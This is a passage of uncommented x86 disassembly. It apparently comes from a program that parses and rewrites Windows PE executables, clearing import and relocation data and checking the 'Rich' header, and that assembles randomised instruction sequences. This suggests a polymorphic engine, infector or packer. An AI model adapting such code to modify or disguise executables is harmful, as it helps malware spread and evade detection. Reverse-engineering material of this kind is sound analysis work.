cmp dh, 80h
jbe short loc_41023A
mov edx, [esi]
lea eax, dword_41A478
mov [eax+6], edx
mov edx, [ebp+arg_10]
mov [eax+3], dl
mov dl, [ecx]
mov [eax+1], dl
mov dl, [ecx+1]
mov [eax+5], dl
push 0Ah
push offset dword_41A478
push edi
call sub_40F5BF
add edi, 0Ah
jmp loc_4102F3
; ---------------------------------------------------------------------------
loc_41023A: ; CODE XREF: sub_4100B1+156�j
cmp dl, 80h
jbe short loc_410270
mov edx, [esi]
lea eax, dword_41A468
mov [eax+6], edx
mov edx, [ebp+arg_10]
mov [eax+3], dl
mov dl, [ecx]
mov [eax+1], dl
mov dl, [ecx+1]
mov [eax+5], dl
push 0Ah
push offset dword_41A468
push edi
call sub_40F5BF
add edi, 0Ah
jmp loc_4102F3
; ---------------------------------------------------------------------------
loc_410270: ; CODE XREF: sub_4100B1+18C�j
cmp dl, dh
jnb short loc_41029C
mov edx, [esi]
lea eax, word_41A496
mov [eax+5], edx
mov edx, [ebp+arg_10]
mov [eax+3], dl
mov dl, 7Ch
mov [eax+1], dl
push 0Ah
push offset word_41A496
push edi
call sub_40F5BF
add edi, 0Ah
jmp short loc_4102F3
; ---------------------------------------------------------------------------
loc_41029C: ; CODE XREF: sub_4100B1+1C1�j
cmp dh, dl
jnb short loc_4102D2
mov edx, [esi]
lea eax, byte_41A4AD
mov [eax+6], edx
mov edx, [ebp+arg_10]
mov [eax+3], dl
mov dl, [ecx]
mov [eax+1], dl
mov dl, [ecx+1]
mov byte ptr [eax+5], 8
add [eax+5], dl
push 0Ah
push offset byte_41A4AD
push edi
call sub_40F5BF
add edi, 0Ah
jmp short loc_4102F3
; ---------------------------------------------------------------------------
loc_4102D2: ; CODE XREF: sub_4100B1+1ED�j
mov edx, [esi]
lea eax, dword_41A4A0
mov [eax+5], edx
mov edx, [ebp+arg_10]
mov [eax+3], dl
push 0Dh
push offset dword_41A4A0
push edi
call sub_40F5BF
add edi, 0Dh
loc_4102F3: ; CODE XREF: sub_4100B1+184�j
; sub_4100B1+1BA�j ...
add [ebp+var_610], 2
mov eax, [ebp+var_610]
mov eax, [eax]
mov ecx, 9
xor edx, edx
div ecx
mov [ebp+var_614], edx
push [ebp+var_614]
push edi
push [ebp+var_60C]
push [ebp+var_608]
push [ebp+var_610]
call sub_410AC0
mov edi, eax
mov eax, [ebp+var_610]
mov eax, [eax]
xor edx, edx
mov ecx, 4
div ecx
mov eax, edx
mov ecx, 3
mul ecx
lea ecx, byte_41A4B7
add ecx, eax
lea eax, dword_41A488
mov edx, [ebp+arg_10]
mov [eax+7], dl
mov dl, [ecx]
mov [eax+1], dl
mov dl, [ecx+1]
mov [eax+2], dl
mov dl, [ecx+2]
mov [eax+5], dl
push 8
push offset dword_41A488
push edi
call sub_40F5BF
add edi, 8
add esi, 4
sub ebx, 4
add [ebp+var_610], 2
loc_41038D: ; CODE XREF: sub_4100B1+ED�j
or ebx, ebx
jnz loc_4101A3
lea eax, dword_41A490
mov ecx, [ebp+arg_C]
mov [eax+1], ecx
push 6
push offset dword_41A490
push edi
call sub_40F5BF
add edi, 6
push [ebp+var_614]
push edi
push [ebp+var_60C]
push [ebp+var_608]
push [ebp+var_610]
call sub_410AC0
mov edi, eax
lea eax, [ebp+var_628]
push eax
call sub_410AA0
sub edi, [ebp+arg_8]
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 14h
sub_4100B1 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F0 proc near ; CODE XREF: sub_40FFD0+82�p
var_628 = byte ptr -628h
var_614 = dword ptr -614h
var_610 = dword ptr -610h
var_60C = dword ptr -60Ch
var_608 = dword ptr -608h
var_604 = byte ptr -604h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFF9D8h
push edi
push esi
push ebx
lea eax, [ebp+var_628]
push eax
call sub_410B20
lea eax, [ebp+var_628]
push eax
call sub_410A20
lea eax, [ebp+var_628]
push eax
call sub_410A20
lea eax, [ebp+var_604]
push eax
call sub_405260
lea eax, [ebp+var_604]
mov [ebp+var_610], eax
lea eax, [ebp+var_628]
mov esi, [eax]
mov [ebp+var_608], esi
xor ebx, ebx
jmp short loc_41044E
; ---------------------------------------------------------------------------
loc_41044A: ; CODE XREF: sub_4103F0+61�j
inc ebx
add esi, 4
loc_41044E: ; CODE XREF: sub_4103F0+58�j
cmp dword ptr [esi], 0
jnz short loc_41044A
mov [ebp+var_60C], ebx
mov ebx, [ebp+arg_4]
shr ebx, 2
shl ebx, 2
cmp ebx, [ebp+arg_4]
jz short loc_41046D
add ebx, 4
mov [ebp+var_4], ebx
loc_41046D: ; CODE XREF: sub_4103F0+75�j
mov eax, [ebp+var_610]
mov eax, [eax]
mov ecx, 8
xor edx, edx
div ecx
mov [ebp+var_614], edx
mov edi, [ebp+arg_8]
push [ebp+var_614]
push edi
push [ebp+var_60C]
push [ebp+var_608]
push [ebp+var_610]
call sub_410AC0
mov edx, eax
sub edx, edi
mov edi, eax
mov ecx, 14h
sub ecx, edx
mov [ebp+var_614], ecx
lea esi, aA ; "€"
mov eax, [ebp+arg_10]
mov [esi+3], al
mov eax, [ebp+arg_C]
mov [esi+4], eax
push 8
push offset aA ; "€"
push edi
call sub_40F5BF
add edi, 8
mov esi, [ebp+arg_0]
jmp loc_41068D
; ---------------------------------------------------------------------------
loc_4104E2: ; CODE XREF: sub_4103F0+29F�j
mov eax, [ebp+var_610]
mov eax, [eax]
mov ecx, 6
xor edx, edx
div ecx
mov [ebp+var_614], edx
push [ebp+var_614]
push edi
push [ebp+var_60C]
push [ebp+var_608]
push [ebp+var_610]
call sub_410AC0
mov edi, eax
mov eax, [ebp+var_610]
mov eax, [eax]
xor edx, edx
mov ecx, 4
div ecx
mov eax, edx
mov ecx, 3
mul ecx
mov edx, [esi]
mov ecx, [ebp+var_610]
mov ecx, [ecx]
cmp ch, cl
jbe short loc_410543
xor edx, ecx
loc_410543: ; CODE XREF: sub_4103F0+14F�j
lea ecx, byte_41A4C3
add ecx, eax
cmp dh, dl
jbe short loc_4105A2
lea eax, dword_41A478
mov [eax+6], edx
mov edx, [ebp+arg_10]
mov [eax+3], dl
mov dl, [ecx]
mov [eax+1], dl
mov dl, [ecx+1]
mov [eax+5], dl
mov edx, [ebp+var_610]
mov edx, [edx]
cmp dh, dl
jbe short loc_410590
mov [eax+0Ch], edx
mov dl, [ecx+2]
mov [eax+0Bh], dl
push 10h
push offset dword_41A478
push edi
call sub_40F5BF
add edi, 10h
jmp short loc_4105F3
; ---------------------------------------------------------------------------
loc_410590: ; CODE XREF: sub_4103F0+183�j
push 0Ah
push offset dword_41A478
push edi
call sub_40F5BF
add edi, 0Ah
jmp short loc_4105F3
; ---------------------------------------------------------------------------
loc_4105A2: ; CODE XREF: sub_4103F0+15D�j
lea eax, dword_41A478
mov [eax+6], edx
mov edx, [ebp+arg_10]
mov [eax+3], dl
mov dl, [ecx]
mov [eax+1], dl
mov dl, [ecx+1]
mov [eax+5], dl
mov edx, [ebp+var_610]
mov edx, [edx]
cmp dh, dl
jbe short loc_4105E3
mov [eax+0Ch], edx
mov dl, [ecx+2]
mov [eax+0Bh], dl
push 10h
push offset dword_41A478
push edi
call sub_40F5BF
add edi, 10h
jmp short loc_4105F3
; ---------------------------------------------------------------------------
loc_4105E3: ; CODE XREF: sub_4103F0+1D6�j
push 0Ah
push offset dword_41A478
push edi
call sub_40F5BF
add edi, 0Ah
loc_4105F3: ; CODE XREF: sub_4103F0+19E�j
; sub_4103F0+1B0�j ...
add [ebp+var_610], 2
mov eax, [ebp+var_610]
mov eax, [eax]
mov ecx, 9
xor edx, edx
div ecx
mov [ebp+var_614], edx
push [ebp+var_614]
push edi
push [ebp+var_60C]
push [ebp+var_608]
push [ebp+var_610]
call sub_410AC0
mov edi, eax
mov eax, [ebp+var_610]
mov eax, [eax]
xor edx, edx
mov ecx, 4
div ecx
mov eax, edx
mov ecx, 3
mul ecx
lea ecx, byte_41A4B7
add ecx, eax
lea eax, dword_41A488
mov edx, [ebp+arg_10]
mov [eax+7], dl
mov dl, [ecx]
mov [eax+1], dl
mov dl, [ecx+1]
mov [eax+2], dl
mov dl, [ecx+2]
mov [eax+5], dl
push 8
push offset dword_41A488
push edi
call sub_40F5BF
add edi, 8
add esi, 4
sub ebx, 4
add [ebp+var_610], 2
loc_41068D: ; CODE XREF: sub_4103F0+ED�j
or ebx, ebx
jnz loc_4104E2
lea eax, dword_41A490
mov ecx, [ebp+arg_C]
mov [eax+1], ecx
push 6
push offset dword_41A490
push edi
call sub_40F5BF
add edi, 6
push [ebp+var_614]
push edi
push [ebp+var_60C]
push [ebp+var_608]
push [ebp+var_610]
call sub_410AC0
mov edi, eax
lea eax, [ebp+var_628]
push eax
call sub_410AA0
sub edi, [ebp+arg_8]
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 14h
sub_4103F0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4106F0 proc near ; CODE XREF: sub_404DC0+60�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
mov [ebp+var_4], edi
add edi, [edi+3Ch]
lea edi, [edi+78h]
mov esi, edi
add esi, 60h
mov ebx, [esi]
push ebx
push [ebp+arg_0]
call sub_404130
mov ebx, eax
add ebx, [ebp+arg_0]
push dword ptr [esi+4]
push 0
push ebx
call sub_40F5F0
mov dword ptr [esi], 0
mov dword ptr [esi+4], 0
add edi, 8
mov eax, [edi]
push eax
push [ebp+arg_0]
call sub_404130
add [ebp+var_4], eax
mov ebx, eax
push edi
push ebx
mov [ebp+var_8], 0
mov edi, ebx
add edi, [ebp+arg_0]
jmp loc_4107F6
; ---------------------------------------------------------------------------
loc_410758: ; CODE XREF: sub_4106F0+10A�j
mov eax, [edi+0Ch]
push eax
push [ebp+arg_0]
call sub_404130
add eax, [ebp+arg_0]
mov ebx, eax
push ebx
call sub_40A266
add ebx, eax
cmp [ebp+var_8], ebx
jnb short loc_410779
mov [ebp+var_8], ebx
loc_410779: ; CODE XREF: sub_4106F0+84�j
mov esi, [edi]
push esi
push [ebp+arg_0]
call sub_404130
mov esi, eax
add esi, [ebp+arg_0]
cmp [ebp+var_8], esi
jnb short loc_410791
mov [ebp+var_8], esi
loc_410791: ; CODE XREF: sub_4106F0+9C�j
mov ebx, [edi+10h]
push ebx
push [ebp+arg_0]
call sub_404130
mov ebx, eax
add ebx, [ebp+arg_0]
jmp short loc_4107AB
; ---------------------------------------------------------------------------
loc_4107A4: ; CODE XREF: sub_4106F0+BE�j
xor eax, eax
mov [ebx], eax
add ebx, 4
loc_4107AB: ; CODE XREF: sub_4106F0+B2�j
cmp dword ptr [ebx], 0
jnz short loc_4107A4
cmp [ebp+var_8], ebx
jnb short loc_4107B8
mov [ebp+var_8], ebx
loc_4107B8: ; CODE XREF: sub_4106F0+C3�j
jmp short loc_4107EE
; ---------------------------------------------------------------------------
loc_4107BA: ; CODE XREF: sub_4106F0+101�j
mov eax, [esi]
test eax, 80000000h
jnz short loc_4107E7
push eax
push [ebp+arg_0]
call sub_404130
add eax, [ebp+arg_0]
mov ebx, eax
add eax, 2
push eax
call sub_40A266
add eax, 2
add ebx, eax
cmp [ebp+var_8], ebx
jnb short loc_4107E7
mov [ebp+var_8], ebx
loc_4107E7: ; CODE XREF: sub_4106F0+D1�j
; sub_4106F0+F2�j
xor eax, eax
mov [esi], eax
add esi, 4
loc_4107EE: ; CODE XREF: sub_4106F0:loc_4107B8�j
cmp dword ptr [esi], 0
jnz short loc_4107BA
add edi, 14h
loc_4107F6: ; CODE XREF: sub_4106F0+63�j
cmp dword ptr [edi+0Ch], 0
jnz loc_410758
pop ebx
pop edi
mov eax, [edi]
push eax
push [ebp+arg_0]
call sub_404130
add eax, [ebp+arg_0]
push dword ptr [edi+4]
push 0
push eax
call sub_40F5F0
mov dword ptr [edi], 0
mov dword ptr [edi+4], 0
add ebx, [ebp+arg_0]
mov ecx, [ebp+var_8]
sub ecx, ebx
push ecx
push 0
push ebx
call sub_40F5F0
pop ebx
pop esi
pop edi
leave
retn 4
sub_4106F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410840 proc near ; CODE XREF: sub_404DC0+1F2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
push [ebp+arg_0]
pop [ebp+var_4]
mov esi, [ebp+var_4]
add esi, [esi+3Ch]
lea esi, [esi+78h]
mov ebx, [ebp+arg_4]
add esi, 8
mov [esi], ebx
push ebx
push [ebp+var_4]
call sub_404130
mov ebx, eax
add ebx, [ebp+var_4]
push dword_41A550
push offset dword_41A4E0
push ebx
call sub_40F5BF
mov edx, [esi]
add [ebx], edx
add [ebx+4], edx
mov edi, ebx
add edi, 0Ch
add [edi+10h], edx
add [edi+0Ch], edx
add [edi], edx
add edi, 28h
add [edi], edx
add [edi+4], edx
add dword ptr [esi], 0Ch
mov dword ptr [esi+4], 28h
pop ebx
pop esi
pop edi
leave
retn 8
sub_410840 endp
; ---------------------------------------------------------------------------
dd 24648Dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108B0 proc near ; CODE XREF: sub_404DC0+1DA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push edi
push esi
push ebx
pusha
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov ecx, [esi+3Ch]
add esi, ecx
movzx eax, word ptr [esi+6]
mov [ebp+var_8], eax
add esi, 0F8h
mov ebx, [ebp+var_8]
jmp short loc_4108ED
; ---------------------------------------------------------------------------
loc_4108D7: ; CODE XREF: sub_4108B0+3F�j
mov ecx, [esi+14h]
add ecx, [esi+10h]
cmp ecx, edi
jbe short loc_4108E9
sub edi, [esi+14h]
add edi, [esi+0Ch]
jmp short loc_4108F1
; ---------------------------------------------------------------------------
loc_4108E9: ; CODE XREF: sub_4108B0+2F�j
add esi, 28h
dec ebx
loc_4108ED: ; CODE XREF: sub_4108B0+25�j
or ebx, ebx
jnz short loc_4108D7
loc_4108F1: ; CODE XREF: sub_4108B0+37�j
mov [ebp+var_4], edi
popa
mov eax, [ebp+var_4]
pop ebx
pop esi
pop edi
leave
retn 8
sub_4108B0 endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410900 proc near ; CODE XREF: sub_40FEC0+19�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
mov [ebp+var_8], 0FFFFFFFFh
mov esi, [ebp+arg_0]
mov eax, [esi+3Ch]
mov [ebp+var_C], eax
mov dword ptr [esi+3Ch], 0
mov eax, 80h
xor ecx, ecx
mov edi, eax
jmp short loc_410937
; ---------------------------------------------------------------------------
loc_41092B: ; CODE XREF: sub_410900+39�j
xor edx, edx
mov dl, [esi+ecx]
rol edx, cl
add edi, edx
inc ecx
cmp ecx, eax
loc_410937: ; CODE XREF: sub_410900+29�j
cmp eax, ecx
jnz short loc_41092B
mov [ebp+var_4], edi
mov eax, [ebp+var_C]
mov [esi+3Ch], eax
cmp edi, 884F3421h
jnz short loc_4109C9
add esi, 80h
mov eax, [esi+4]
xor eax, [esi]
xor eax, 0AA559966h
cmp eax, 0F93BF822h
jnz short loc_4109C9
mov eax, [esi+8]
xor eax, [esi+0Ch]
or eax, eax
jnz short loc_4109C9
xor ebx, ebx
jmp short loc_410979
; ---------------------------------------------------------------------------
loc_410971: ; CODE XREF: sub_410900+80�j
cmp ebx, 64h
jbe short loc_410978
jmp short loc_410982
; ---------------------------------------------------------------------------
loc_410978: ; CODE XREF: sub_410900+74�j
inc ebx
loc_410979: ; CODE XREF: sub_410900+6F�j
cmp dword ptr [esi+ebx*4], 68636952h
jnz short loc_410971
loc_410982: ; CODE XREF: sub_410900+76�j
cmp ebx, 64h
jnb short loc_4109C9
inc ebx
mov edi, [esi+4]
add esi, 8
mov eax, ebx
xor edx, edx
mov ecx, 4
mul ecx
sub eax, 8
mov ecx, 8
div ecx
mov ebx, eax
jmp short loc_4109B9
; ---------------------------------------------------------------------------
loc_4109A7: ; CODE XREF: sub_410900+BB�j
mov edx, [esi]
xor edx, edi
mov ecx, [esi+4]
xor ecx, edi
rol edx, cl
add [ebp+var_4], edx
add esi, 8
dec ebx
loc_4109B9: ; CODE XREF: sub_410900+A5�j
or ebx, ebx
jnz short loc_4109A7
cmp edi, [ebp+var_4]
jnz short loc_4109C9
mov [ebp+var_8], 0
loc_4109C9: ; CODE XREF: sub_410900+4A�j
; sub_410900+61�j ...
mov eax, [ebp+var_8]
pop ebx
pop esi
pop edi
leave
retn 4
sub_410900 endp
; ---------------------------------------------------------------------------
db 8Dh
dd 24A4h, 9B8D0000h, 0
; =============== S U B R O U T I N E =======================================
sub_4109E0 proc near ; CODE XREF: sub_40FEC0+78�p
push esi
push edi
push ebx
call sub_40A1A0
mov ebx, eax
loc_4109EA: ; CODE XREF: sub_4109E0:loc_4109F3�j
shr eax, 1
jnb short loc_4109F3
xor eax, 13245769h
loc_4109F3: ; CODE XREF: sub_4109E0+C�j
loop loc_4109EA
xor edx, edx
add ecx, ebx
mov eax, ecx
mov ecx, 34h
div ecx
movzx edx, dl
lea ecx, dword_41A560
mov eax, [ecx+edx*4]
pop ebx
pop edi
pop esi
retn
sub_4109E0 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 24A48D00h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A20 proc near ; CODE XREF: sub_4100B1+1F�p
; sub_4100B1+2B�p ...
var_60C = dword ptr -60Ch
var_608 = byte ptr -608h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFF9F4h
pusha
lea eax, [ebp+var_608]
push eax
call sub_405260
mov eax, [ebp+arg_0]
mov esi, [eax]
xor ebx, ebx
jmp short loc_410A43
; ---------------------------------------------------------------------------
loc_410A3F: ; CODE XREF: sub_410A20+26�j
inc ebx
add esi, 4
loc_410A43: ; CODE XREF: sub_410A20+1D�j
cmp dword ptr [esi], 0
jnz short loc_410A3F
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
lea edi, [ebp+var_608]
mov eax, [ebp+arg_0]
mov esi, [eax]
xor ebx, ebx
jmp short loc_410A8A
; ---------------------------------------------------------------------------
loc_410A5D: ; CODE XREF: sub_410A20+6D�j
mov eax, [edi]
mov ecx, [ebp+var_8]
xor edx, edx
div ecx
shl edx, 2
mov eax, ebx
shl eax, 2
mov ecx, [edx+esi]
mov [ebp+var_60C], ecx
mov ecx, [eax+esi]
mov [edx+esi], ecx
mov ecx, [ebp+var_60C]
mov [eax+esi], ecx
inc edi
dec [ebp+var_4]
loc_410A8A: ; CODE XREF: sub_410A20+3B�j
cmp ebx, [ebp+var_4]
jnz short loc_410A5D
popa
leave
retn 4
sub_410A20 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410AA0 proc near ; CODE XREF: sub_4100B1+327�p
; sub_4103F0+2E8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
push dword ptr [edi]
call sub_40A296
push dword ptr [edi+8]
call sub_40A296
pop edi
leave
retn 4
sub_410AA0 endp
; ---------------------------------------------------------------------------
db 5
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410AC0 proc near ; CODE XREF: sub_4100B1+B0�p
; sub_4100B1+122�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
push [ebp+arg_10]
pop [ebp+var_4]
loc_410AD5: ; CODE XREF: sub_410AC0+4C�j
mov eax, [edi]
xor edx, edx
mov ecx, [ebp+arg_8]
div ecx
shl edx, 2
mov ecx, [edx+esi]
movzx ebx, byte ptr [ecx]
inc ecx
push ebx
push ecx
push [ebp+arg_C]
call sub_40F5BF
add [ebp+arg_C], ebx
sub [ebp+var_4], ebx
cmp [ebp+var_4], 0FFFF0000h
ja short loc_410B07
cmp [ebp+var_4], 0
jnz short loc_410B09
loc_410B07: ; CODE XREF: sub_410AC0+3F�j
jmp short loc_410B0E
; ---------------------------------------------------------------------------
loc_410B09: ; CODE XREF: sub_410AC0+45�j
add edi, 2
jmp short loc_410AD5
; ---------------------------------------------------------------------------
loc_410B0E: ; CODE XREF: sub_410AC0:loc_410B07�j
mov eax, [ebp+arg_C]
pop ebx
pop esi
pop edi
leave
retn 14h
sub_410AC0 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 90000000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B20 proc near ; CODE XREF: sub_4100B1+13�p
; sub_4103F0+13�p
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFBF8h
push edi
push ebx
mov ebx, 0FFFFFFFFh
mov edi, [ebp+arg_0]
push 0FA00h
call sub_40A290
or eax, eax
jz loc_410C1C
mov [edi], eax
mov [edi+4], eax
push 0FA00h
push 0
push dword ptr [edi]
call sub_40F5F0
lea eax, [ebp+var_400]
push eax
call sub_405260
push 0FA00h
call sub_40A290
or eax, eax
jz loc_410C1C
mov [edi+8], eax
mov [edi+0Ch], eax
push 0FA00h
call sub_40A290
mov [ebp+var_404], eax
push 0FA00h
call sub_40A290
mov [ebp+var_408], eax
push 0FA00h
push 0
push dword ptr [edi+8]
call sub_40F5F0
push 105h
push offset byte_41A693
push [ebp+var_404]
call sub_40F5BF
push 90h
push offset dword_41A798
push [ebp+var_408]
call sub_40F5BF
lea edi, [ebp+var_400]
push 1Dh
push [ebp+var_404]
push 0FFFFFFFFh
push edi
push [ebp+arg_0]
call sub_410C30
add edi, 64h
push 10h
push [ebp+var_408]
push 0FFFFFFFFh
push edi
push [ebp+arg_0]
call sub_410C60
push [ebp+var_404]
call sub_40A296
push [ebp+var_408]
call sub_40A296
xor ebx, ebx
loc_410C1C: ; CODE XREF: sub_410B20+1F�j
; sub_410B20+50�j
mov eax, ebx
pop ebx
pop edi
leave
retn 4
sub_410B20 endp
; ---------------------------------------------------------------------------
dd 24A48Dh, 5000000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C30 proc near ; CODE XREF: sub_410B20+C9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push edi
push esi
push ebx
xor ebx, ebx
mov esi, [ebp+arg_C]
jmp short loc_410C54
; ---------------------------------------------------------------------------
loc_410C3D: ; CODE XREF: sub_410C30+27�j
mov ecx, [ebp+arg_4]
lea ecx, [ecx+ebx*8]
push [ebp+arg_8]
push esi
push ecx
push [ebp+arg_0]
call sub_410CF0
add esi, 9
inc ebx
loc_410C54: ; CODE XREF: sub_410C30+B�j
cmp ebx, [ebp+arg_10]
jnz short loc_410C3D
pop ebx
pop esi
pop edi
leave
retn 14h
sub_410C30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410C60 proc near ; CODE XREF: sub_410B20+DF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
push dword_41A68F
call sub_40A290
mov [ebp+var_4], eax
push dword_41A68F
push offset dword_41A640
push [ebp+var_4]
call sub_40F5BF
mov esi, [ebp+arg_C]
xor ebx, ebx
jmp short loc_410CDA
; ---------------------------------------------------------------------------
loc_410C91: ; CODE XREF: sub_410C60+7D�j
push ebx
xor ebx, ebx
jmp short loc_410CD0
; ---------------------------------------------------------------------------
loc_410C96: ; CODE XREF: sub_410C60+73�j
mov edx, [ebp+var_4]
movzx eax, byte ptr [ebx+edx]
cmp byte ptr [esi+8], 0
jnz short loc_410CA8
add [esi+7], al
jmp short loc_410CAB
; ---------------------------------------------------------------------------
loc_410CA8: ; CODE XREF: sub_410C60+41�j
add [esi+8], al
loc_410CAB: ; CODE XREF: sub_410C60+46�j
cmp [ebp+arg_8], 0FFFFFFFFh
jz short loc_410CBC
cmp [ebp+arg_8], 0FFFFFFFFh
jz short loc_410CCF
cmp ebx, [ebp+arg_8]
jz short loc_410CCF
loc_410CBC: ; CODE XREF: sub_410C60+4F�j
mov ecx, [ebp+arg_4]
lea ecx, [ecx+ebx*8]
push [ebp+arg_8]
push esi
push ecx
push [ebp+arg_0]
call sub_410CF0
loc_410CCF: ; CODE XREF: sub_410C60+55�j
; sub_410C60+5A�j
inc ebx
loc_410CD0: ; CODE XREF: sub_410C60+34�j
cmp ebx, 7
jnz short loc_410C96
pop ebx
inc ebx
add esi, 9
loc_410CDA: ; CODE XREF: sub_410C60+2F�j
cmp ebx, [ebp+arg_10]
jnz short loc_410C91
push [ebp+var_4]
call sub_40A296
pop ebx
pop esi
pop edi
leave
retn 14h
sub_410C60 endp
; ---------------------------------------------------------------------------
dw 0FF8Bh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CF0 proc near ; CODE XREF: sub_410C30+1B�p
; sub_410C60+6A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push esi
push edi
push ebx
mov ebx, [ebp+arg_8]
mov [ebp+var_C], ebx
movzx eax, byte ptr [ebx]
mov [ebp+var_8], eax
movzx eax, byte ptr [ebx+5]
shl eax, 2
lea ecx, byte_41A67F
add ecx, eax
mov ecx, [ecx]
movzx eax, byte ptr [ecx]
mov [ebp+var_10], eax
inc ecx
mov [ebp+var_4], ecx
add ebx, 6
xor edi, edi
jmp loc_410DAB
; ---------------------------------------------------------------------------
loc_410D2A: ; CODE XREF: sub_410CF0+BE�j
cmp [ebp+arg_C], 0FFFFFFFFh
jz short loc_410D3B
cmp [ebp+arg_C], 0FFFFFFFFh
jz short loc_410DAA
cmp edi, [ebp+arg_C]
jz short loc_410DAA
loc_410D3B: ; CODE XREF: sub_410CF0+3E�j
mov eax, [ebp+arg_0]
mov esi, [eax+0Ch]
mov eax, [ebp+var_8]
mov [esi], al
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ecx], esi
inc esi
add dword ptr [eax+4], 4
push [ebp+var_8]
push ebx
push esi
call sub_40F5BF
mov ecx, [ebp+var_4]
movzx ecx, byte ptr [edi+ecx]
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+1]
add [eax+esi], cl
mov eax, [ebp+arg_4]
mov ecx, [eax+edi*4]
mov eax, [eax+edi*2]
rol eax, cl
mov ecx, [ebp+arg_8]
movzx edx, byte ptr [ecx+4]
movzx ecx, byte ptr [ecx+3]
cmp edx, 1
jnz short loc_410D8E
mov [ecx+esi], cl
jmp short loc_410DA0
; ---------------------------------------------------------------------------
loc_410D8E: ; CODE XREF: sub_410CF0+97�j
cmp edx, 4
jnz short loc_410DA0
and eax, 0FFFFh
or eax, offset loc_40D868
mov [ecx+esi], eax
loc_410DA0: ; CODE XREF: sub_410CF0+9C�j
; sub_410CF0+A1�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
inc ecx
add [eax+0Ch], ecx
loc_410DAA: ; CODE XREF: sub_410CF0+44�j
; sub_410CF0+49�j
inc edi
loc_410DAB: ; CODE XREF: sub_410CF0+35�j
cmp edi, [ebp+var_10]
jnz loc_410D2A
pop ebx
pop edi
pop esi
leave
retn 10h
sub_410CF0 endp
; ---------------------------------------------------------------------------
db 5
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410DC0 proc near ; CODE XREF: sub_409610+AB�p
; sub_410F30+FA�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push edi
push esi
push ebx
push [ebp+arg_0]
pop [ebp+var_14]
mov [ebp+var_18], 0FFFFFFFFh
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_4]
mov [ebp+var_8], 6
mov [ebp+var_4], 0
mov [ebp+var_10], 1
mov eax, [ebp+var_14]
